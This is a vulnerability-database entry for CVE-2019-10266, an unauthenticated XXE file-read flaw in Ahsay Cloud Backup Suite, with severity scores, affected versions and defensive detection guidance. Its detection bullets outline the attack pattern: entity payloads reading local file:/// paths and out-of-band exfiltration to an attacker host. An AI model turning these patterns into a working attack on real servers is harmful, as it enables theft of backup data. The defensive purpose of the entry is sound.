cbcvebase.
CVE-2019-10266
published 2019-07-26

CVE-2019-10266: An issue was discovered in Ahsay Cloud Backup Suite before 8.1.1.50. When sending an out-of-bounds XML document to a URL, it is possible to read the file…

PriorityP259high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
13.30%
95.9th percentile
An issue was discovered in Ahsay Cloud Backup Suite before 8.1.1.50. When sending an out-of-bounds XML document to a URL, it is possible to read the file structure and even the content of files without authentication.

Affected

1 ranges
VendorProductVersion rangeFixed in
ahsaycloud_backup_suite>= 7.7.0.0 < 8.1.1.508.1.1.50

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe
  • Monitor for unauthenticated HTTP requests containing XML payloads with DOCTYPE declarations and ENTITY references (XXE pattern) sent to Ahsay Cloud Backup Suite endpoints. The exploit sends an out-of-bounds XML document to a URL without authentication.
  • Detect out-of-band XXE exfiltration attempts: look for outbound HTTP requests from the Ahsay server to attacker-controlled hosts (e.g., http://attacker/oob) triggered by XML entity expansion, indicating file content exfiltration via OOB channel.
  • Alert on XML payloads referencing local file URIs (file:///c:/) in entity declarations, which indicates attempted local file read via XXE on Windows-based Ahsay Backup installations.
  • ·The vulnerability affects Ahsay Cloud Backup Suite versions 7.x through 8.1.0.50 (fixed in 8.1.1.50). Ensure version scoping is correct when deploying detections — versions at or above 8.1.1.50 are patched.
  • ·The exploit targets Windows-based deployments (file:///c:/) but the XXE technique can also be used to probe internal hosts, so detection should not be limited to Windows file URI schemes alone.

CVSS provenance

nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:C/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.